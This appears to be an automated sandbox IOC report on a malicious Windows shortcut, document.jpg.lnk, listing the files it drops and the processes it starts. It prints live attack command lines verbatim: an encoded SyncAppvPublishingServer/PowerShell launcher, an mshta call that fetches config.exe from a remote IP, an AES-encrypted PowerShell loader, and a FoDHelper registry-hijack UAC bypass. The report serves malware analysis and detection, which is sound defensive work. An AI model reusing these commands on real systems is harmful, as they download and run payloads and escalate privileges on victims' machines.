IOC Report
document.jpg.lnk

loading gif

Files

File Path
Type
Category
Malicious
document.jpg.lnk
MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=325, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\config[1].exe
data
dropped
malicious
C:\Users\user\AppData\Local\Temp\r.bat
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\tiago.exe
PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x827a5401, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zj5igx1.gwe.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40241sdr.dcg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aiw1jb0v.vir.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c2oyqq5z.bt0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmbx53cn.kow.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_erisu5kg.heb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etjy0v1k.qiu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpafpudm.yfu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0cgtfcj.m11.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lz1sabhd.e23.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_muyou3cf.is2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nke5tatl.yql.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxegjbbo.vpi.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u0av1kme.pyk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvwiqscy.ntv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhw3ws4v.zlu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF5c222e.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\67M7P0PNVSACSNW7Q2KH.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UQMJU6NIXI1BRPTECC69.temp
data
dropped
C:\Users\user\AppData\Roaming\document.jpg
PNG image data, 799 x 1120, 8-bit/color RGBA, non-interlaced
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
\Device\Mup\user-PC\PIPE\samr
GLS_BINARY_LSB_FIRST
dropped
There are 23 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\System32\SyncAppvPublishingServer.vbs" ;565,571,560,572,553,488,560,572,572,568,514,503,503,513,505,502,513,506,502,506,508,512,502,507,510,503,524,567,575,566,564,567,553,556,571,503,555,567,566,558,561,559,502,557,576,557|%{$n+=[char]($_-456)};$n | powershell -
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer ;565,571,560,572,553,488,560,572,572,568,514,503,503,513,505,502,513,506,502,506,508,512,502,507,510,503,524,567,575,566,564,567,553,556,571,503,555,567,566,558,561,559,502,557,576,557|%{$n+=[char]($_-456)};$n | powershell -}
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
malicious
C:\Windows\System32\mshta.exe
"C:\Windows\system32\mshta.exe" http://91.92.248.36/Downloads/config.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $wauLzkw = 'AAAAAAAAAAAAAAAAAAAAAC7jT7k2FpD87CLIrJ9ISnHDdPpfVzATPpoiAtYTLdFLieEW9Wcm5GZnAG730ovvdvCx2W3yRhgvQGbWqRIx1uUAZcuGN8EscCVCTS0qIChJYeddbgEzIlsXR1P4OGmfx28Mlt4HonstX3P9IXJ2NVrwLwViIgsbkcc8IW0IGriMYcZJnaVpN0BEhSv1PbPa/uSPAn1MRqr7oIUaXCD7sO8vyOlOmMUygb6Txkck2EaFrqc5jzIY/B6l+tSKFR2TaJTbwNESaJ3v0PjwPWc7BICtgblIfJ7Ffrqof+Y9HdbPb2wR45/goynDklb3GybSxaSMW0GCitx/38zqGjlYitPzhemmpt+qkRiPZ1PuuoqtQ3nRQ1GR4IPtSYZJt1lO6zQOaasoQ8Daa1TjJb7LBpmBWa3azu+dgCHRT5AOqjTEaGZnMzrmciLcGnkTqE+ocR9LZVgwXk5hB/Lmb015dUsiF5FWn3OU7FGhCPItFamJx9smK+7wDBeexND3pouFjEc78eeTGMHnAKOdzs3K7xhBHGkznWX/UXiT61u5sByCoqz60ethpxKU00SZ3tHiLgs9d1c76RDtxY5PkHAJfhbJsZfg80uUi2O77UtG8n5AlsamOOQySRDWs3aObsxtyzboWd+W4uk5cfOSYucr4jqaUwarCyT2Yj1jhskXaeNOo7xKNELgvPiC8FxgeVyzn0EZpbT7Kyo3XwbvHwc4JvbL2dfzV8pIJhGKvzt7v+N53fGlW52T/+Lurhoactx1trlLS7UTKgjb0nSQ3uZUDIZuYVyyZkqypCe2I/xrdYLfWoSXNkKnvLX+dWp7aWEdhLKuEnGn8JrddRNIO8h0JM1lzDJZjxVZOFFIze+1vYKn81IecZ8RcfC4IVTI1JW4WIwW3YHcvW4cjFYDe3M3zlsY5ripw40/q+pjw19TnQARSg9cR1uQBLGJRoWqX1L3dHkcpZ4P8rtAPiGN+rJDVugLlvR/I6qn7CYCT+pbs/FcHUFVVsV9TgWY8aEhIFoVjNTzpPNxK8CciZQ04MlJe25/iUVY58geYi3OtGbZ5YigM9PTDZmzSygThR7tva48jUtPFlOqFEduBsER9ecZvPadNlxpBm1iY4BaBCjk2rHN6gXh42fBZcKycwCjRnrTWukgWa+E6q7hlwIJvoItmniPZDJlw68Tw2eF4zsgGgws96009C414dcIsmZum65niIko+IZLBz/SKB95+1NNpTX504n85RpDq23vT8VIofraSfZBit0znw6iTLWc+Uyta0+lXrDu+lu68zFH8i7dYqSCezg5ZHxYYDrF0veWXGzZ12Vi4ZvnbUEEUgCiMKmfv4D+ty6xXVtBDU5yP6lc4J6K1ga54GKEAGhFe2tKDf1yMXWpvWIU/jtI3YDo8qafjyhI3WmvpZqWxec4OhWBohwszxuBJqHZDr1VBKP0zcZX7ftJQXGOf9O+qH9twlcec31cfCsddl9zi7o00jr13E0p0nDnPyFNuzsW9d4giErN9ITyfRSBAzTgjl/uXJ4plm10KTaN6++XCgmfn5jkInzJPBFLUKtinrVzMkF/k6rfpRPOIVdovN4J6XZeYbr5WJvy2tZRm/UN2HD5d91ysyPZYOQIfWCnre4gRZe79qsa6tE4cUuT+6DPmN0iN39ThcfpVhQ8+bR8TuFXFodjIUJ8dafJGKmAZ07eY8A/NlJEh7ZXJJHrAmIzOsKY+T+5xbIIK7nQS4BRT/xCat15Oq/NqNT4mewGZJ62HCjCRD5/q9mr0p4lVMTVJC546HUzxRtUrJqGBqa7gIkNn7rYZ3gHsuET340eGQSu/2vJo7fdRL7kNPHvBNIVE5+jI1/d0zeDiSlwNyOUznxV0PqrIF/z5CwWQwjuwb9QPphEumuLDmydfAQ/EVWpYpyFRWHrI00g3FRr+tjQIqi7Yiw8NLuI8OcG7pey1ffnpX8pyTOO1VswtTJjoITkEkmyuaK/SeLhGwiDlSRC72VdQellMY4k5PBIs3vzaoFa7CAUpLDH';$OgScJgJi = 'SkpHRVl2TnV5dFNtYW5DdHVYbGRPQk5QandWRlpOU0o=';$BwerIjm = New-Object 'System.Security.Cryptography.AesManaged';$BwerIjm.Mode = [System.Security.Cryptography.CipherMode]::ECB;$BwerIjm.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$BwerIjm.BlockSize = 128;$BwerIjm.KeySize = 256;$BwerIjm.Key = [System.Convert]::FromBase64String($OgScJgJi);$FfImT = [System.Convert]::FromBase64String($wauLzkw);$dpHrhAbw = $FfImT[0..15];$BwerIjm.IV = $dpHrhAbw;$VveFZCBje = $BwerIjm.CreateDecryptor();$qFKMUzafD = $VveFZCBje.TransformFinalBlock($FfImT, 16, $FfImT.Length - 16);$BwerIjm.Dispose();$FDICvmkx = New-Object System.IO.MemoryStream( , $qFKMUzafD );$hebjfzMz = New-Object System.IO.MemoryStream;$bIJBQdkJw = New-Object System.IO.Compression.GzipStream $FDICvmkx, ([IO.Compression.CompressionMode]::Decompress);$bIJBQdkJw.CopyTo( $hebjfzMz );$bIJBQdkJw.Close();$FDICvmkx.Close();[byte[]] $BDYZJphM = $hebjfzMz.ToArray();$eYTnUe = [System.Text.Encoding]::UTF8.GetString($BDYZJphM);$eYTnUe | powershell -
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe
malicious
C:\Windows\System32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F
malicious
C:\Windows\System32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
malicious
C:\Windows\System32\fodhelper.exe
FoDHelper.exe
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "
malicious